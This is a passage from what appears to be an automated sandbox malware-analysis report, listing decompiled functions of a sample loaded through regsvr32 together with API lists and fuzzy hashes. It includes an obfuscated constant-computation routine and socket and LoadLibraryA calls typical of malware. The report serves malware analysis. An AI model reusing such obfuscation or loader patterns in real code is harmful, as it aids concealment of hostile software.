                                                                                                                                                                            				WCHAR* _t56;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_t56 = __edx;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E00E7FE29(_t44);
                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v28 = 0xcd60b7;
                                                                                                                                                                            				_v12 = 0x7257ab;
                                                                                                                                                                            				_v12 = _v12 << 0xd;
                                                                                                                                                                            				_v12 = _v12 + 0x8f69;
                                                                                                                                                                            				_v12 = _v12 * 0x4c;
                                                                                                                                                                            				_v12 = _v12 ^ 0x410f7a13;
                                                                                                                                                                            				_v8 = 0x7b4696;
                                                                                                                                                                            				_v8 = _v8 + 0xffff4950;
                                                                                                                                                                            				_v8 = _v8 | 0x2a0f624b;
                                                                                                                                                                            				_v8 = _v8 * 0x3a;
                                                                                                                                                                            				_v8 = _v8 ^ 0xa0f3ec54;
                                                                                                                                                                            				_v20 = 0x8a2161;
                                                                                                                                                                            				_v20 = _v20 + 0xffff45ea;
                                                                                                                                                                            				_v20 = _v20 ^ 0x1b6c7fa6;
                                                                                                                                                                            				_v20 = _v20 ^ 0x1be8dede;
                                                                                                                                                                            				_v16 = 0xdcc12a;
                                                                                                                                                                            				_v16 = _v16 + 0xb9f4;
                                                                                                                                                                            				_v16 = _v16 + 0xffffcfef;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00d9de04;
                                                                                                                                                                            				E00E6EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
                                                                                                                                                                            				_t53 = lstrcmpiW(_a4, _t56); // executed
                                                                                                                                                                            				return _t53;
                                                                                                                                                                            			}












                                                                                                                                                                            0x00e80624
                                                                                                                                                                            0x00e80627
                                                                                                                                                                            0x00e80629
                                                                                                                                                                            0x00e8062c
                                                                                                                                                                            0x00e8062f
                                                                                                                                                                            0x00e80630
                                                                                                                                                                            0x00e80631
                                                                                                                                                                            0x00e80636
                                                                                                                                                                            0x00e8063d
                                                                                                                                                                            0x00e80644
                                                                                                                                                                            0x00e8064b
                                                                                                                                                                            0x00e8064f
                                                                                                                                                                            0x00e80667
                                                                                                                                                                            0x00e8066a
                                                                                                                                                                            0x00e80671
                                                                                                                                                                            0x00e80678
                                                                                                                                                                            0x00e8067f
                                                                                                                                                                            0x00e8068b
                                                                                                                                                                            0x00e8068e
                                                                                                                                                                            0x00e80695
                                                                                                                                                                            0x00e8069c
                                                                                                                                                                            0x00e806a3
                                                                                                                                                                            0x00e806aa
                                                                                                                                                                            0x00e806b1
                                                                                                                                                                            0x00e806b8
                                                                                                                                                                            0x00e806bf
                                                                                                                                                                            0x00e806c6
                                                                                                                                                                            0x00e806d9
                                                                                                                                                                            0x00e806e5
                                                                                                                                                                            0x00e806eb

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00E806E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253623838.0000000000E61000.00000020.00000001.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253619899.0000000000E60000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253642695.0000000000E86000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_e60000_regsvr32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                                            • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                                                                                            • Instruction ID: db5077cbf4f08f4f232b11da07b176349136d951c6e153208a582039d060e5ff
                                                                                                                                                                            • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                                                                                            • Instruction Fuzzy Hash: 60210FB1C01209ABCF14DFA9D98A99EBFB5FB20354F108298E529B6251D3B48B04CB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            APIs
                                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 100011F1
                                                                                                                                                                            • _memset.LIBCMT ref: 10001205
                                                                                                                                                                            • htonl.WS2_32(00000000), ref: 1000121B
                                                                                                                                                                            • htons.WS2_32(?), ref: 1000122F
                                                                                                                                                                            • socket.WS2_32(00000002,00000002,00000000), ref: 10001245
                                                                                                                                                                            • bind.WS2_32(?,?,00000010), ref: 1000126A
                                                                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 100012AC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1003240404-0
                                                                                                                                                                            • Opcode ID: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
                                                                                                                                                                            • Instruction ID: 88ed1bb05716eef25c8d7e89d15ea7d56457a166ccc4c5acc9453768105f33a4
                                                                                                                                                                            • Opcode Fuzzy Hash: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
                                                                                                                                                                            • Instruction Fuzzy Hash: 1C215974A01228AFE760DF60CC85BD9B7B4EF49714F1081D8E949AB381CB71A9C2DF51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E10008B90(intOrPtr __ecx) {
                                                                                                                                                                            				int _v8;
                                                                                                                                                                            				int _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				struct HDC__* _v120;
                                                                                                                                                                            				char _v124;
                                                                                                                                                                            				int _v128;
                                                                                                                                                                            				int _v132;
                                                                                                                                                                            				int _v136;
                                                                                                                                                                            				struct HICON__* _v140;
                                                                                                                                                                            				intOrPtr _v144;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                            				int _t40;
                                                                                                                                                                            				void* _t41;
                                                                                                                                                                            				void* _t66;
                                                                                                                                                                            				struct tagRECT* _t82;
                                                                                                                                                                            				void* _t84;
                                                                                                                                                                            				void* _t85;
                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                            
                                                                                                                                                                            				_t37 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_v32 = _t37 ^ _t86;
                                                                                                                                                                            				_v144 = __ecx;
                                                                                                                                                                            				_t40 = IsIconic( *(_v144 + 0x20));
                                                                                                                                                                            				_t87 = _t40;
                                                                                                                                                                            				if(_t40 == 0) {
                                                                                                                                                                            					_t41 = E1000C473(_t66, _v144, _t84, _t85, __eflags);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_push(_v144);
                                                                                                                                                                            					E10013247(_t66,  &_v124, _t84, _t85, _t87);
                                                                                                                                                                            					_t88 =  &_v124;
                                                                                                                                                                            					if( &_v124 != 0) {
                                                                                                                                                                            						_v136 = _v120;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_v136 = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
                                                                                                                                                                            					_v128 = GetSystemMetrics(0xb);
                                                                                                                                                                            					_v132 = GetSystemMetrics(0xc);
                                                                                                                                                                            					_t82 =  &_v28;
                                                                                                                                                                            					GetClientRect( *(_v144 + 0x20), _t82);
                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                            					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                            					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
                                                                                                                                                                            					_v140 =  *((intOrPtr*)(_v144 + 0x188));
                                                                                                                                                                            					_t79 = _v8;
                                                                                                                                                                            					DrawIcon(_v120, _v12, _v8, _v140);
                                                                                                                                                                            					_t41 = E1001329B(_t66,  &_v124, _t84, _t85, _t88);
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
                                                                                                                                                                            			}


























                                                                                                                                                                            0x10008b99
                                                                                                                                                                            0x10008ba0
                                                                                                                                                                            0x10008ba3
                                                                                                                                                                            0x10008bb3
                                                                                                                                                                            0x10008bb9
                                                                                                                                                                            0x10008bbb
                                                                                                                                                                            0x10008c94
                                                                                                                                                                            0x10008bc1
                                                                                                                                                                            0x10008bc7
                                                                                                                                                                            0x10008bcb
                                                                                                                                                                            0x10008bd3
                                                                                                                                                                            0x10008bd5
                                                                                                                                                                            0x10008be6
                                                                                                                                                                            0x10008bd7
                                                                                                                                                                            0x10008bd7
                                                                                                                                                                            0x10008bd7
                                                                                                                                                                            0x10008c01
                                                                                                                                                                            0x10008c0f
                                                                                                                                                                            0x10008c1a
                                                                                                                                                                            0x10008c1d
                                                                                                                                                                            0x10008c2b
                                                                                                                                                                            0x10008c3d
                                                                                                                                                                            0x10008c42
                                                                                                                                                                            0x10008c51
                                                                                                                                                                            0x10008c56
                                                                                                                                                                            0x10008c65
                                                                                                                                                                            0x10008c72
                                                                                                                                                                            0x10008c7e
                                                                                                                                                                            0x10008c87
                                                                                                                                                                            0x10008c87
                                                                                                                                                                            0x10008ca6

                                                                                                                                                                            APIs
                                                                                                                                                                            • IsIconic.USER32 ref: 10008BB3
                                                                                                                                                                              • Part of subcall function 10013247: __EH_prolog3.LIBCMT ref: 1001324E
                                                                                                                                                                              • Part of subcall function 10013247: BeginPaint.USER32(?,?,00000004,1000C48A,?,00000058,10008C99), ref: 1001327A
                                                                                                                                                                            • SendMessageA.USER32 ref: 10008C01
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10008C09
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10008C14
                                                                                                                                                                            • GetClientRect.USER32 ref: 10008C2B
                                                                                                                                                                            • DrawIcon.USER32 ref: 10008C7E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1007970657-0
                                                                                                                                                                            • Opcode ID: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
                                                                                                                                                                            • Instruction ID: 92cad86a1f48a06ffd889b7e25b84ff06398f92b7342aaec6ad7b9fd969ef154
                                                                                                                                                                            • Opcode Fuzzy Hash: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
                                                                                                                                                                            • Instruction Fuzzy Hash: BB31F975A00119DFEB24CFA8C995F9EBBB4FF48240F108299E549E7285DE30AA44CF60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                                            			E1000A803(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v284;
                                                                                                                                                                            				char _v288;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                            				intOrPtr* _t18;
                                                                                                                                                                            				void* _t26;
                                                                                                                                                                            				void* _t27;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                            				void* _t35;
                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                            				void* _t37;
                                                                                                                                                                            
                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                            				_t28 = __ecx;
                                                                                                                                                                            				_t26 = __ebx;
                                                                                                                                                                            				_t9 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_v8 = _t9 ^ _t36;
                                                                                                                                                                            				_t39 = _a4 - 0x800;
                                                                                                                                                                            				_t35 = __ecx;
                                                                                                                                                                            				if(_a4 != 0x800) {
                                                                                                                                                                            					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						goto L2;
                                                                                                                                                                            					} else {
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_push(E1001808E(__edx,  &_v288, 4, "LOC"));
                                                                                                                                                                            					E10009BC7(__ebx, _t28, __edi, _t35);
                                                                                                                                                                            					_t37 = _t37 + 0x10;
                                                                                                                                                                            					L2:
                                                                                                                                                                            					_push(_t26);
                                                                                                                                                                            					_push(_t33);
                                                                                                                                                                            					_t34 =  *(E10017D62(_t39));
                                                                                                                                                                            					 *(E10017D62(_t39)) =  *_t14 & 0x00000000;
                                                                                                                                                                            					_t35 = 0x112;
                                                                                                                                                                            					_t27 = E10016E0C( &_v284, 0x112, 0x111, 0x112,  &_v288);
                                                                                                                                                                            					_t18 = E10017D62(_t39);
                                                                                                                                                                            					_t40 =  *_t18;
                                                                                                                                                                            					if( *_t18 == 0) {
                                                                                                                                                                            						 *(E10017D62(__eflags)) = _t34;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						E10009DD1( *((intOrPtr*)(E10017D62(_t40))));
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t27 == 0xffffffff || _t27 >= _t35) {
                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t12 = LoadLibraryA( &_v284);
                                                                                                                                                                            					}
                                                                                                                                                                            					_pop(_t33);
                                                                                                                                                                            					_pop(_t26);
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                                                                                            			}

















                                                                                                                                                                            0x1000a803
                                                                                                                                                                            0x1000a803
                                                                                                                                                                            0x1000a803
                                                                                                                                                                            0x1000a803
                                                                                                                                                                            0x1000a80c
                                                                                                                                                                            0x1000a813
                                                                                                                                                                            0x1000a816
                                                                                                                                                                            0x1000a81e
                                                                                                                                                                            0x1000a826
                                                                                                                                                                            0x1000a89a
                                                                                                                                                                            0x1000a89c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a89e
                                                                                                                                                                            0x1000a828
                                                                                                                                                                            0x1000a835
                                                                                                                                                                            0x1000a836
                                                                                                                                                                            0x1000a83b
                                                                                                                                                                            0x1000a83e
                                                                                                                                                                            0x1000a83e
                                                                                                                                                                            0x1000a83f
                                                                                                                                                                            0x1000a845
                                                                                                                                                                            0x1000a84c
                                                                                                                                                                            0x1000a85c
                                                                                                                                                                            0x1000a871
                                                                                                                                                                            0x1000a873
                                                                                                                                                                            0x1000a878
                                                                                                                                                                            0x1000a87b
                                                                                                                                                                            0x1000a8a5
                                                                                                                                                                            0x1000a87d
                                                                                                                                                                            0x1000a884
                                                                                                                                                                            0x1000a889
                                                                                                                                                                            0x1000a8aa
                                                                                                                                                                            0x1000a8bf
                                                                                                                                                                            0x1000a8bf
                                                                                                                                                                            0x1000a8b0
                                                                                                                                                                            0x1000a8b7
                                                                                                                                                                            0x1000a8b7
                                                                                                                                                                            0x1000a8c1
                                                                                                                                                                            0x1000a8c2
                                                                                                                                                                            0x1000a8c2
                                                                                                                                                                            0x1000a8cf

                                                                                                                                                                            APIs
                                                                                                                                                                            • _strcpy_s.LIBCMT ref: 1000A830
                                                                                                                                                                              • Part of subcall function 10009BC7: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 10009BC7: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                              • Part of subcall function 10017D62: __getptd_noexit.LIBCMT ref: 10017D62
                                                                                                                                                                            • __snprintf_s.LIBCMT ref: 1000A869
                                                                                                                                                                              • Part of subcall function 10016E0C: __vsnprintf_s_l.LIBCMT ref: 10016E21
                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 1000A894
                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 1000A8B7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                                                                            • String ID: LOC
                                                                                                                                                                            • API String ID: 4018564869-519433814
                                                                                                                                                                            • Opcode ID: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
                                                                                                                                                                            • Instruction ID: ee9450464cbd3e0ce3331b4d2b41357aa0e69ec1529eb2fe66138b72776ed960
                                                                                                                                                                            • Opcode Fuzzy Hash: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
                                                                                                                                                                            • Instruction Fuzzy Hash: A9119A7190411CABF725D760DC86BDD37B8EF06790F504161F6049B191DF74AEC68BA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                            			E100167D5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                            				intOrPtr _v0;
                                                                                                                                                                            				void* _v804;
                                                                                                                                                                            				intOrPtr _v808;
                                                                                                                                                                            				intOrPtr _v812;
                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                                            				long _t17;
                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                            				void* _t34;
                                                                                                                                                                            
                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                            				_t26 = __edi;
                                                                                                                                                                            				_t25 = __edx;
                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                            				_t6 = __eax;
                                                                                                                                                                            				_t34 = _t22 -  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				if(_t34 == 0) {
                                                                                                                                                                            					asm("repe ret");
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x1005afc0 = _t6;
                                                                                                                                                                            				 *0x1005afbc = _t22;
                                                                                                                                                                            				 *0x1005afb8 = _t25;
                                                                                                                                                                            				 *0x1005afb4 = _t21;
                                                                                                                                                                            				 *0x1005afb0 = _t27;
                                                                                                                                                                            				 *0x1005afac = _t26;
                                                                                                                                                                            				 *0x1005afd8 = ss;
                                                                                                                                                                            				 *0x1005afcc = cs;
                                                                                                                                                                            				 *0x1005afa8 = ds;
                                                                                                                                                                            				 *0x1005afa4 = es;
                                                                                                                                                                            				 *0x1005afa0 = fs;
                                                                                                                                                                            				 *0x1005af9c = gs;
                                                                                                                                                                            				asm("pushfd");
                                                                                                                                                                            				_pop( *0x1005afd0);
                                                                                                                                                                            				 *0x1005afc4 =  *_t31;
                                                                                                                                                                            				 *0x1005afc8 = _v0;
                                                                                                                                                                            				 *0x1005afd4 =  &_a4;
                                                                                                                                                                            				 *0x1005af10 = 0x10001;
                                                                                                                                                                            				_t11 =  *0x1005afc8; // 0x0
                                                                                                                                                                            				 *0x1005aec4 = _t11;
                                                                                                                                                                            				 *0x1005aeb8 = 0xc0000409;
                                                                                                                                                                            				 *0x1005aebc = 1;
                                                                                                                                                                            				_t12 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_v812 = _t12;
                                                                                                                                                                            				_t13 =  *0x10057a0c; // 0xf12c274
                                                                                                                                                                            				_v808 = _t13;
                                                                                                                                                                            				 *0x1005af08 = IsDebuggerPresent();
                                                                                                                                                                            				_push(1);
                                                                                                                                                                            				E100227FB(_t14);
                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                            				_t17 = UnhandledExceptionFilter(0x1002b434);
                                                                                                                                                                            				if( *0x1005af08 == 0) {
                                                                                                                                                                            					_push(1);
                                                                                                                                                                            					E100227FB(_t17);
                                                                                                                                                                            				}
                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                            			}



















                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167db
                                                                                                                                                                            0x100167dd
                                                                                                                                                                            0x100167dd
                                                                                                                                                                            0x1001c395
                                                                                                                                                                            0x1001c39a
                                                                                                                                                                            0x1001c3a0
                                                                                                                                                                            0x1001c3a6
                                                                                                                                                                            0x1001c3ac
                                                                                                                                                                            0x1001c3b2
                                                                                                                                                                            0x1001c3b8
                                                                                                                                                                            0x1001c3bf
                                                                                                                                                                            0x1001c3c6
                                                                                                                                                                            0x1001c3cd
                                                                                                                                                                            0x1001c3d4
                                                                                                                                                                            0x1001c3db
                                                                                                                                                                            0x1001c3e2
                                                                                                                                                                            0x1001c3e3
                                                                                                                                                                            0x1001c3ec
                                                                                                                                                                            0x1001c3f4
                                                                                                                                                                            0x1001c3fc
                                                                                                                                                                            0x1001c407
                                                                                                                                                                            0x1001c411
                                                                                                                                                                            0x1001c416
                                                                                                                                                                            0x1001c41b
                                                                                                                                                                            0x1001c425
                                                                                                                                                                            0x1001c42f
                                                                                                                                                                            0x1001c434
                                                                                                                                                                            0x1001c43a
                                                                                                                                                                            0x1001c43f
                                                                                                                                                                            0x1001c44b
                                                                                                                                                                            0x1001c450
                                                                                                                                                                            0x1001c452
                                                                                                                                                                            0x1001c45a
                                                                                                                                                                            0x1001c465
                                                                                                                                                                            0x1001c472
                                                                                                                                                                            0x1001c474
                                                                                                                                                                            0x1001c476
                                                                                                                                                                            0x1001c47b
                                                                                                                                                                            0x1001c48f

                                                                                                                                                                            APIs
                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 1001C445
                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001C45A
                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(1002B434), ref: 1001C465
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 1001C481
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 1001C488
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2579439406-0
                                                                                                                                                                            • Opcode ID: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
                                                                                                                                                                            • Instruction ID: 29b7c1aed7e77d05a339182a33a9266dca5d513d51f4b37265af4c9016ee4a47
                                                                                                                                                                            • Opcode Fuzzy Hash: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
                                                                                                                                                                            • Instruction Fuzzy Hash: 0021B0B4408328DFE701DFA9EDC96487BB0FB0A315F50406AE508873A1E7B459C2CF55
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E100126F9(void* __ecx, CHAR* _a4) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				struct HRSRC__* _t8;
                                                                                                                                                                            				void* _t9;
                                                                                                                                                                            				void* _t11;
                                                                                                                                                                            				void* _t14;
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				void* _t16;
                                                                                                                                                                            				struct HINSTANCE__* _t17;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            
                                                                                                                                                                            				_t14 = 0;
                                                                                                                                                                            				_t11 = 0;
                                                                                                                                                                            				_t19 = _a4;
                                                                                                                                                                            				_t18 = __ecx;
                                                                                                                                                                            				if(_a4 == 0) {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_t16 = E100122B0(_t11, _t18, _t11);
                                                                                                                                                                            					if(_t11 != 0 && _t14 != 0) {
                                                                                                                                                                            						FreeResource(_t14);
                                                                                                                                                                            					}
                                                                                                                                                                            					return _t16;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t17 =  *(E1000D5EC(0, 0, _t15, _t19) + 0xc);
                                                                                                                                                                            				_t8 = FindResourceA(_t17, _a4, 0xf0);
                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t9 = LoadResource(_t17, _t8);
                                                                                                                                                                            				_t14 = _t9;
                                                                                                                                                                            				if(_t14 != 0) {
                                                                                                                                                                            					_t11 = LockResource(_t14);
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t9;
                                                                                                                                                                            			}















                                                                                                                                                                            0x100126fd
                                                                                                                                                                            0x100126ff
                                                                                                                                                                            0x10012701
                                                                                                                                                                            0x10012705
                                                                                                                                                                            0x10012707
                                                                                                                                                                            0x1001273c
                                                                                                                                                                            0x10012746
